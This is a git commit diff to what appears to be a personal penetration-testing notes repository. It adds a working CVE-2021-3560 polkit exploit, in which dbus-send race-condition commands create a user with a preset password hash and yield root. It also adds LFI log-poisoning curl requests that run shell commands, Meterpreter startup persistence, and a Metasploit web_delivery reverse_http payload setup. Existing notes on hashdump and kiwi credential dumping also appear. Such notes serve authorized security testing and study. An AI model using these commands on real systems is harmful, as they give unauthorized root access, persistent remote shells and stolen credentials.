bump

2021-09-11 02:55:17 +02:00 · 2021-09-11 02:55:17 +02:00 · 55970b5c82
parent 9623d1008d
commit 55970b5c82
6 changed files with 65 additions and 7 deletions
--- a/exploit/linux/polkit.md
+++ b/exploit/linux/polkit.md
@ -0,0 +1,24 @@
 # CVE-2021-3560
 * Exploit `< 0.105-26ubuntu1.1`
 ## Racing Condition
 * Request creation of account via dbus message and `pkexec`. sleep time is variable.
 ```sh
 dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
 ```
    * Create password via `openssl passwd -6 -salt salt password123`
 ```sh
 dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
 ```
 * Request is killed after polkits receives it
 * Polkit requests uid of user who sent the message, which has been deleted
 * Error will be thrown
 * Uid turns to root afterwards
 * Request succeeds
 * `su user1` and `sudo -s`
--- a/exploit/web/local_file_inclusion.md
+++ b/exploit/web/local_file_inclusion.md
@ -1,6 +1,8 @@
 # Local File Inclusion
 To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
 * [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
 ## Usage
 * Exploit URL parameter by including other files.
@ -28,3 +30,4 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
    ```HTTP
    curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
    ```
--- a/pentesting.md
+++ b/pentesting.md
@ -1,4 +1,11 @@
-# Methodology
+# Pentesting
 Authorized audit of security systems of computers and networks.
 * [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
    * Permissions
    * Scope
    * Rules
 ## Methodology
 * Steps
    * Reconnaissance
@ -8,7 +15,7 @@
    * Covering Tracks
    * Reporting
-## Reconnaissance
+### Reconnaissance
 * Duck / SearX / metacrawler / google
 * Wikipedia
 * [Shodan.io](http://www.shodan.io)
@ -19,7 +26,7 @@
 * builtwith.com
 * wappalyzer
-## Enumeration
+### Enumeration
 * nmap
 * nikto
 * gobuster
@ -27,16 +34,24 @@
 * metasploit
 * enum4linux / linpeas / winpeas / linenum
-## Exploitation
+### Exploitation
-## Privilege Escalation
+### Post Exploitation
 * Pivoting
 #### Privilege Escalation
 * Vertically or horizontally
-## Covering Tracks
+#### Covering Tracks
-## Reporting
+#### Reporting
 * Includes
    * Vulnerabilities
    * Criticality
    * Description
    * Countermeasures 
    * Finding summary
 ## Frameworks
 * [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
 * [NIST](https://www.nist.gov/cyberframework)
 * [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
--- a/persistence/meterpreter.md
+++ b/persistence/meterpreter.md
@ -0,0 +1,6 @@
 # Meterpreter Persistence
 ## Load shell on system startup
 ```sh
 run persistence -X
 ```
--- a/post_exploitation/docs/metasploit.md
+++ b/post_exploitation/docs/metasploit.md
@ -48,3 +48,13 @@ run post/windows/gather/hashdump
 load kiwi
 lsa_dump_sam
 ```
 ### Webdelivery
 ```sh
 use exploit/multi/script/web_delivery
 show targets
 set LPORT <attacker-Port>
 set PAYLOAD windows/meterpreter/reverse_http
 run -j
 ```
 * Copy into powershell/cmd
--- a/reverse_shells/docs/prep
+++ b/reverse_shells/docs/prep